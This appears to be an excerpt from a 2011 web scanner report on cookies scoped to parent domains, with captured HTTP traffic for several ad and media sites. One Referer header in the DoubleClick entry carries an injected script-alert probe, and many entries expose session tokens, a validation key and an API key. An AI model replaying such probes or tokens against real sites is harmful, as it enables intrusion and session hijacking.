A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

11.1. http://a.analytics.yahoo.com/fpc.pl  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://a.analytics.yahoo.com
Path:   /fpc.pl

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fpc.pl?a=10001494318262&v=5.17&enc=UTF-8&b=Downloads%20%7C%20Yahoo!%20Advertising%20Blog&f=http%3A%2F%2Fwww.yadvertisingblog.com%2Fblog%2Fdownloads%2F&e=http%3A%2F%2Fwww.yadvertisingblog.com%2Fblog%2F2011%2F05%2F31%2Fyahoo-launches-clear-ad-notice%2F&flv=Shockwave%20Flash%2010.3%20r181&d=Tue%2C%2014%20Jun%202011%2000%3A26%3A38%20GMT&n=5&g=en-US&h=Y&j=1920x1200&k=32&l=true&ittidx=0&fpc=v-Z-Or9d%7CqwoUoZiLaa%7Cfses10001494318262%3D%7CqwoUoZiLaa%7Cv-Z-Or9d%7Cfvis10001494318262%3DZT1odHRwJTNBJTJGJTJGYWR2ZXJ0aXNpbmcueWFob28uY29tJTJGJmY9aHR0cCUzQSUyRiUyRnd3dy55YWR2ZXJ0aXNpbmdibG9nLmNvbSUyRmJsb2clMkYyMDExJTJGMDUlMkYzMSUyRnlhaG9vLWxhdW5jaGVzLWNsZWFyLWFkLW5vdGljZSUyRiZiPVlhaG9vISUyMExhdW5jaGVzJTIwQ0xFQVIlMjBBZCUyME5vdGljZSUyMCU3QyUyMFlhaG9vISUyMEFkdmVydGlzaW5nJTIwQmxvZw%3D%3D%7C8MYoY8Yos7%7C8MYoY8Yos7%7C8MYoY8Yos7%7C8%7C8MYoY8Yos7%7C8MYoY8Yos7 HTTP/1.1
Host: a.analytics.yahoo.com
Proxy-Connection: keep-alive
Referer: http://www.yadvertisingblog.com/blog/downloads/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=edn6q5d6t078b&b=3&s=vv; CH=AgBN5uYQADlWEAA1WxAALXwQAC0hEAAhWRAAM70QADEpEAA6vhAABx4QABKh; itvisitorid10001494318262=qwoUoZiLaa|v-Z-Or9d|fvis10001494318262=ZT1odHRwJTNBJTJGJTJGYWR2ZXJ0aXNpbmcueWFob28uY29tJTJGJmY9aHR0cCUzQSUyRiUyRnd3dy55YWR2ZXJ0aXNpbmdibG9nLmNvbSUyRmJsb2clMkYyMDExJTJGMDUlMkYzMSUyRnlhaG9vLWxhdW5jaGVzLWNsZWFyLWFkLW5vdGljZSUyRiZiPVlhaG9vISUyMExhdW5jaGVzJTIwQ0xFQVIlMjBBZCUyME5vdGljZSUyMCU3QyUyMFlhaG9vISUyMEFkdmVydGlzaW5nJTIwQmxvZw==|8MYoY8Yos7|8MYoY8Yos7|8MYoY8Yos7|8|8MYoY8Yos7|8MYoY8Yos7; itsessionid10001494318262=qwoUoZiLaa|fses10001494318262=; itvisitorid1000380893662=eekMoZiLaa|R_XJW0dg|fvis1000380893662=Zj1odHRwJTNBJTJGJTJGYWR2ZXJ0aXNpbmcueWFob28uY29tJTJGJmI9SG9tZSUyMHBhZ2U=|M|M|M|s|8MYoY8YoMM|M; itsessionid1000380893662=eekMoZiLaa|fses1000380893662=; ALP=bTowJmw6ZW5fVVMm

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:27:35 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: itvisitorid10001494318262=qwoUoZiLaa|v-Z-Or9d|fvis10001494318262=ZT1odHRwJTNBJTJGJTJGYWR2ZXJ0aXNpbmcueWFob28uY29tJTJGJmY9aHR0cCUzQSUyRiUyRnd3dy55YWR2ZXJ0aXNpbmdibG9nLmNvbSUyRmJsb2clMkYyMDExJTJGMDUlMkYzMSUyRnlhaG9vLWxhdW5jaGVzLWNsZWFyLWFkLW5vdGljZSUyRiZiPVlhaG9vISUyMExhdW5jaGVzJTIwQ0xFQVIlMjBBZCUyME5vdGljZSUyMCU3QyUyMFlhaG9vISUyMEFkdmVydGlzaW5nJTIwQmxvZw==|7|7|7|8|8MYoY88s11|7; path=/; domain=.analytics.yahoo.com
Set-Cookie: itsessionid10001494318262=qwoUoZiLaa|fses10001494318262=; path=/; domain=.analytics.yahoo.com
TS: 0 261 dc3_ac4
Pragma: no-cache
Expires: Tue, 14 Jun 2011 00:27:36 GMT
Cache-Control: no-cache, private, must-revalidate
Content-Length: 45
Accept-Ranges: bytes
Tracking-Status: fpc site tracked
Connection: close
Content-Type: application/x-javascript

// First Party Cookies
// TS: 0 261 dc3_ac4

11.2. http://a.analytics.yahoo.com/p.pl  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://a.analytics.yahoo.com
Path:   /p.pl

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /p.pl?a=1000380893662&v=5.17&enc=UTF-8&b=Home%20page&c=yahoo!%20advertising%20solutions&f=http%3A%2F%2Fadvertising.yahoo.com%2F&x=7&cf20=EXIT&cf21=click%20Sponsored%20Search&ca=1&ix=2&ittidx=0&fpc= HTTP/1.1
Host: a.analytics.yahoo.com
Proxy-Connection: keep-alive
Referer: http://advertising.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=edn6q5d6t078b&b=3&s=vv; CH=AgBN5uYQADlWEAA1WxAALXwQAC0hEAAhWRAAM70QADEpEAA6vhAABx4QABKh; itvisitorid1000380893662=eekMoZiLaa|R_XJW0dg|fvis1000380893662=Zj1odHRwJTNBJTJGJTJGYWR2ZXJ0aXNpbmcueWFob28uY29tJTJGJmI9SG9tZSUyMHBhZ2U=|8MYoY8YosM|8MYoY8YosM|8MYoY8YosM|8|8MYoY8YosM|8MYoY8YosM; itsessionid1000380893662=eekMoZiLaa|fses1000380893662=; itvisitorid10001494318262=qwoUoZiLaa|v-Z-Or9d|fvis10001494318262=ZT1odHRwJTNBJTJGJTJGYWR2ZXJ0aXNpbmcueWFob28uY29tJTJGJmY9aHR0cCUzQSUyRiUyRnd3dy55YWR2ZXJ0aXNpbmdibG9nLmNvbSUyRmJsb2clMkYyMDExJTJGMDUlMkYzMSUyRnlhaG9vLWxhdW5jaGVzLWNsZWFyLWFkLW5vdGljZSUyRiZiPVlhaG9vISUyMExhdW5jaGVzJTIwQ0xFQVIlMjBBZCUyME5vdGljZSUyMCU3QyUyMFlhaG9vISUyMEFkdmVydGlzaW5nJTIwQmxvZw==|8MYoY8Yos7|8MYoY8Yos7|8MYoY8Yos7|8|8MYoY8Yos7|8MYoY8Yos7; itsessionid10001494318262=qwoUoZiLaa|fses10001494318262=

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:20:33 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: itvisitorid1000380893662=eekMoZiLaa|R_XJW0dg|fvis1000380893662=Zj1odHRwJTNBJTJGJTJGYWR2ZXJ0aXNpbmcueWFob28uY29tJTJGJmI9SG9tZSUyMHBhZ2U=|M|M|M|s|8MYoY8YoMM|M; path=/; domain=.analytics.yahoo.com
Set-Cookie: itsessionid1000380893662=eekMoZiLaa|fses1000380893662=; path=/; domain=.analytics.yahoo.com
TS: 0 272 dc12_ac4
Connection: close
Pragma: no-cache
Expires: Tue, 14 Jun 2011 00:20:34 GMT
Cache-Control: no-cache, private, must-revalidate
Accept-Ranges: bytes
Tracking-Status: site tracked
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;
11.3. http://gs.mtv.com/games/playgame.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://gs.mtv.com
Path:   /games/playgame.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /games/playgame.php?site_id=1&game_id=1390 HTTP/1.1
Host: gs.mtv.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/games/arcade/game/play.jhtml?arcadeGameId=10325912
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1864906649-1307963885068; mtvn_guid=1307963888-186; s_nr=1307963913916; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D5840%253Bdemo%253D2966%253Bdemo%253D2907%253Bdemo%253D2905%253Bdemo%253D2904%253Bdemo%253D1607%253Bdemo%253D1299%253Bdemo%253D850%253Bdemo%253D848%253Bdemo%253D844%253Bdemo%253D827%253Bdemo%253D790%253Bdemo%253D777%253Bdemo%253D775%253Bdemo%253D774; s_ppv=62; s_cc=true; s_sq=%5B%5BB%5D%5D; mbox=session#1308010496673-477284#1308012624|check#true#1308010824; __cs_rr=1; adPlayCounter=0

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.8
Content-Type: text/html
Content-Length: 1190
Date: Tue, 14 Jun 2011 00:19:41 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: gs_session=user_id%3D0%26day_stamp%3D15139%26site_id%3D1%26session_id%3D0ba59ab39da532eff77d95c0fb336a2b%26user_name%3D%26validation_key%3Dcbe73a9137cb8591ae079f1a2b3cc064; path=/; domain=mtv.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
11.4. http://www.forexfactory.com/excal.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.forexfactory.com
Path:   /excal.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /excal.php?do=fetchcss&width=845&height=500&font=14&dark=0&colors[3]=%23869BBF%20url%28images/gradients/gradient_tcat.gif%29%20repeat-x&colors[5]=%235C7099%20url%28images/gradients/gradient_thead.gif%29%20repeat-x&colors[7]=%23F5F5FF&colors[4]=%23FFFFFF&colors[6]=%23FFFFFF&colors[8]=%23000000&colors[1]=%230B198C&colors[2]=%23d1d1e1&width_type=px&height_type=px&timezone=-5&timeformat=0&timedst=1&nocache=407.52568085398525 HTTP/1.1
Host: www.forexfactory.com
Proxy-Connection: keep-alive
Referer: http://www.livewithoscar.com/Calendar.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 12:01:48 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: ffsessionhash=f4bf7286639f1eb8531a1e8b00c74e68; path=/; domain=.forexfactory.com; HttpOnly
Set-Cookie: fflastvisit=1308052908; expires=Wed, 13-Jun-2012 12:01:48 GMT; path=/; domain=.forexfactory.com
Set-Cookie: fflastactivity=0; expires=Wed, 13-Jun-2012 12:01:48 GMT; path=/; domain=.forexfactory.com
Cache-Control: private
Pragma: private
X-UA-Compatible: IE=7
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 2361
Content-Type: text/css

#_s_ff_syn {
background: transparent;
margin: 0;
padding: 0;
height: 100%;
}

#wscal_parent * { margin: 0 padding: 0;}

.bigusername { font-size: 14pt; }

.wscal_vbmenu_popup
{
   backgroun
...[SNIP]...
11.5. http://a.tribalfusion.com/j.ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /j.ad

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /j.ad?site=alexacom&adSpace=us&tagKey=2057624979&th=24047165603&tKey=undefined&size=160x600&flashVer=10&ver=1.20&center=1&noAd=1&url=http%3A%2F%2Fwww.alexa.com%2F&f=1&p=11240442&a=1&rnd=11248586 HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1219;c=15/1;w=160;h=600;d=7;s=1;q=ALEXA_core
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=atnfruriItm63PT3eCiVPFU9J3JngpSjAbVAFjAQ74dPYSjsRwrHYvtnr4KeUB2FN0mFZam1Q4Zb5rCJ9tK3lqAbkvlpOS1Rdt7DmDyL6OUtkALmYL4Wavq3MgWc1HeOgorXrJaK5sPy8H3fG6rR2QZb73RfYD7XNfUw2v862OqaRixZb5S92TBo0ZboG8xCyE6ccrY1vMr0lZcJ7HEQqUTs7ZcGWgDTZaBv8fwLdEfO2cZa8blJZaeDCHYK1lVZc5p4aZdjZbgKkBDVSbYfiUeYvpSwrMTOZbs9Wowek8qxQSRDXPB1fo6POyHSk8EZcVlcW544LyeJJRyc7ZcwlPqgZcKVBvq5DYG37tj6JHGQIxn0qQfwbekxTZdBnNq3VQPGVtTDRPQbxuhmTir4T31S7RWZbZdB6DKqCZdjLm33R3r6FushuEK4WJu9ZdYGR2HKcGU8us7udWbaEpQSIXx2NZa

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 101
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=aungjUwl6hwUQQwgQRaCFyUS7jC64OywUPxH2ILm35hSvP9FsxMpesmpvZcKIfCWWhrWEmo3P82WbGmlrZcx7bYZcZagpWnmhairy6ma7rJZb2NA6HsUJcwdNZbaPZbs2Nb2PgQrirwuO5T3mBsjwZc6n329ruwdYsDmIQ7to3tB6ZbwdyuKZdUaV6IeZa6gVVsdAjgeoEB700gMh3ZdOtZd67b0AmhcNCddDXtZaYcwYZd1e7Zb2dZdRfvDfUlFtQ823R25PKTHZabPZax2JX8F6clMqSZaORTCEDtY90WCRXbpAtNEHsrWXN8S2QpOdP6Q6Zd41WXX2R1yIrKYkpZcfxSRoho14QMZbSB36SmkGC0185hLHQsZaKwCrPRcGI54u10SehUmjwOtm54055TZdrgTkHc7m0BimPPCqGAjO55gdM06TeYZbsbZap6n1ZcNJAwGBYIhgR8oWONy4mlQZbZdoO3NBHYYQHoFrMrMTb6CZcw; path=/; domain=.tribalfusion.com; expires=Mon, 12-Sep-2011 00:28:25 GMT;
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 386
Expires: 0
Connection: keep-alive

document.write('<center><a target=_blank href="http://a.tribalfusion.com/h.click/armMfj4sQUYbQKTmPm4mZb7RP7J3dnnXWrZamdIv36YT3GMdTsJ9WVJ7P6FvWdY3WFj43ritVqUtTTQ8SaQISGQIRr6vRW7aVGfQ2FPomHqs0amM4dMBPsb
...[SNIP]...
11.6. http://ad.doubleclick.net/clk  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clk

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /clk;241002212;63651464;o?http://us.havaianas.com/MYOH.html HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
Cookie: id=c60bd0733000097|3226301/1106615/15127,3149839/1069411/15111,2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye; rsi_segs=E11178_10001

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://us.havaianas.com/MYOH.html
Set-Cookie: id=c60bd0733000097|2703878/1001371/15138,3226301/1106615/15127,3149839/1069411/15111,2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye; path=/; domain=.doubleclick.net; expires=Fri, 08 Feb 2013 14:08:21 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Mon, 13 Jun 2011 17:45:35 GMT
Server: GFE/2.0
Content-Type: text/html

11.7. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PortalServe/?pid=1188614T19920110117205515&cid=1478425&pos=h&redir=http://ad.doubleclick.net/click%3Bh=v8/3b26/3/0/*/v%3B242169367%3B0-0%3B3%3B39555935%3B3454-728/90%3B40388893/40406680/1%3Bu=!category-games|pos-atf|tag-adj|mtype-standard|sz-728x90|tile-2|demo-D|demo-T|demo-5840|demo-2966|demo-2907|demo-2905|demo-2904|demo-1607|demo-1299|demo-850|demo-848|demo-844|demo-827|demo-790|demo-777|demo-775|demo-774%3B~aopt=2/1/c6a3/0%3B~sscs=%3F$CTURL$&time=1|19:19|-5&r=0.015173257561400533&flash=10&server=polRedir HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/games/arcade/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=075575AC-65DD-4BD6-BEE2-9CADDD88EAC7; PRbu=Eo1TOtJ24; PRvt=CFJZfEo8h4CIqb!BVBBeJraEo5HX15xKAfDBCeJozEpECIv30c!BdBBeJujEo9GZf8jc!LQBEeJwvEpZYTFEeMAI_BAe; PRgo=BBBAAuILCBVCFUE6C.BZm.!B!B; PRimp=96A50400-1413-8C47-0309-C2F0023E0100; PRca=|AKYt*1093:1|AKRf*443:19|AKTh*396:1|AKKy*396:1|AKZ2*74:1|AKWd*1774:1|AKVe*981:1|AKQh*130:27|AKVX*396:1|AKTY*34573:2|AKKi*16228:2|AKAt*1646:2|#; PRcp=|AKYtAARd:1|AKRfAAHJ:19|AKThAAGY:1|AKKyAAGY:1|AKZ2AABM:1|AKQhAGKI:5|AKWdAA2c:1|AKVeAAPp:1|AKQhAACG:22|AKVXAAGY:1|AKTYAIzd:2|AKKiAENk:2|AKAtAA08:2|#; PRpl=|F5NJ:1|F9VY:19|FX36:1|F2V4:1|FYoZ:2|FYo0:2|F5QS:1|FYoV:1|F10u:1|F2ym:1|FYnn:5|FYnm:10|FYnl:7|FY5B:1|F0tY:1|F0tZ:1|FQvS:2|FB4h:2|#; PRcr=|GOLI:1|GKRu:19|GLnt:1|GMuF:1|GK5Q:1|GOWw:1|GMWF:1|GNEj:1|GMEm:1|GK5V:2|GK5Z:2|GK5W:1|GMEn:2|GMEb:1|GMEa:2|GK5Y:3|GK5P:2|GMEZ:10|GMFk:1|GMyK:1|GMSZ:1|GKiO:2|GBnW:2|#; PRpc=|F5NJGOLI:1|F9VYGKRu:19|FX36GLnt:1|F2V4GMuF:1|FYo0GK5Q:1|FYoZGMEZ:2|FYo0GK5Z:1|F5QSGOWw:1|FYoVGMEZ:1|F10uGMWF:1|F2ymGNEj:1|FYnmGMEm:1|FYnmGK5V:2|FYnnGK5Z:1|FYnnGK5W:1|FYnnGMEn:2|FYnnGMEb:1|FYnmGMEa:2|FYnmGK5Y:3|FYnmGK5P:2|FYnlGMEZ:7|FY5BGMFk:1|F0tYGMyK:1|F0tZGMSZ:1|FQvSGKiO:2|FB4hGBnW:2|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 14 Jun 2011 00:19:16 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 7965
Set-Cookie:PRgo=BBBAAuILCBVCFUE6C.BZm.!B!B;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=A0A50400-79FC-2CEB-0209-123004DD0100; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AJfR*19:2|AKYt*1093:1|AKRf*443:19|AKTh*396:1|AKKy*396:1|AKZ2*74:1|AKWd*1774:1|AKVe*981:1|AKQh*130:27|AKVX*396:1|AKTY*34573:2|AKKi*16228:2|AKAt*1646:2|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AJfRAAAT:2|AKYtAARd:1|AKRfAAHJ:19|AKThAAGY:1|AKKyAAGY:1|AKZ2AABM:1|AKQhAGKI:5|AKWdAA2c:1|AKVeAAPp:1|AKQhAACG:22|AKVXAAGY:1|AKTYAIzd:2|AKKiAENk:2|AKAtAA08:2|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|EzNM:2|F5NJ:1|F9VY:19|FX36:1|F2V4:1|FYoZ:2|FYo0:2|F5QS:1|FYoV:1|F10u:1|F2ym:1|FYnn:5|FYnm:10|FYnl:7|FY5B:1|F0tY:1|F0tZ:1|FQvS:2|FB4h:2|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GMb9:2|GOLI:1|GKRu:19|GLnt:1|GMuF:1|GK5Q:1|GOWw:1|GMWF:1|GNEj:1|GMEm:1|GK5V:2|GK5Z:2|GK5W:1|GMEn:2|GMEb:1|GMEa:2|GK5Y:3|GK5P:2|GMEZ:10|GMFk:1|GMyK:1|GMSZ:1|GKiO:2|GBnW:2|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|EzNMGMb9:2|F5NJGOLI:1|F9VYGKRu:19|FX36GLnt:1|F2V4GMuF:1|FYo0GK5Q:1|FYoZGMEZ:2|FYo0GK5Z:1|F5QSGOWw:1|FYoVGMEZ:1|F10uGMWF:1|F2ymGNEj:1|FYnmGMEm:1|FYnmGK5V:2|FYnnGK5Z:1|FYnnGK5W:1|FYnnGMEn:2|FYnnGMEb:1|FYnmGMEa:2|FYnmGK5Y:3|FYnmGK5P:2|FYnlGMEZ:7|FY5BGMFk:1|F0tYGMyK:1|F0tZGMSZ:1|FQvSGKiO:2|FB4hGBnW:2|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

<script language='javascript' src='http://spd.pointroll.com/PointRoll/Ads/prWriteCode.js'></script><script language='javascript'>var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=functi
...[SNIP]...
11.8. http://api.bizographics.com/v1/profile.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /v1/profile.json?&callback=dj.module.ad.bio.loadBizoData&api_key=r9t72482usanbp6sphprhvun HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoNetworkPartnerIndex=3; BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WisqThbDTBp4B2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQnSLfO0fWLyTcgvE2yQ6Ze1pbZ033FKv3YPdeKubByYtiikBBmWL9vy8qeiiV0HIm4nYPdeKubByYsTG1iiA4HFhaObXcis5ip6FU7wE4Cwiib580ipET68lwNWsfNIUXfAULHZeWiinnp8DesekBgQXcy3tgL326ELqfmQZU2ueTC3wAqip042iirMZRzHxvSTtisvHuK6gvBr0Pej7isVgBvV8Kk0mwBbXkU4HujvywisJd2WNMedisMgTj03JcHP8nOcWG7PlEjoggxAnMEZgmfujiiwd7OBYhLnmqoZbsnNXFrLu9efHlOsWD3viiCAgYAghYxv0EPdR9KLjw34ANmJisipoEKzRnoN2kisFipn0SmXcpqPldy6c1wwIOnACxhiiZKjPFbQPWovaWUipNN9QFd9eD4OnACxhiiZKjFbQEPZ8RywpanugMm4hIisHF8ipo0I9mx5t08YADUXDkiigPUiiKWBw7T81HeReHfLTisiiisV8xMd5is5La2EsecOiiswIOnACxhiiZKjZaTdMSAamf236fFiiolkC0OCwcaIYpAt5LXM0XIwCmlb9oLhkw16YkipCwcaIYpAt5WoPvGg4qipctjJkmu5ePipiiMaODe9cOOkiihdML7elZkd0OC52PD2YWGqMTlyYtq6ZaRfZf5eQkf2ovdhChExDfe35GyRzNlvLnotcIy4PNP83xecbst1iib7gFsDSqDpxImEGrfTPfpgZUI4cd9sW5wsAHescjFAyxuEGrfTPfpgZXwYXPBFhecOvsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhgUUhrqOIuN5aBiiOnqpc8IV71Rjsv7Qu4issSdo1Daipe1h0yfLwyxARVExkNK7HUtFp4B4dlWpgdhb8ERjlseVzj8l3ZY0x538DagN4siiD1aaCmzSiiJQK8lykQMu396nckTo4nxwoHo0CoRZSiif2tsuiicEnxS3cJipCVZ8TsalisgS9TXOCwHZXFvbNlR3nLMBjv3LIcisLQsnJDisGQdUK2D6ztJRFsRyXovJAo8OukxqBLBWr1XIQIIGVWAglyTqlNGtBiitkUr3XlAiscQyzlKxEyj6p6QYsvgf51m9Da6XiirwxBVxp0nP77W3oMweEdXU6bnuSFykW54FN6yii1oRyCQGqk84Nzl6iivmHYAZUugJ8wSyDpwAsYYmSo3LDnHii2Cip8QnOcWG7PlEjokDX1b7LIGtQieie

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/json
Date: Tue, 14 Jun 2011 00:13:55 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
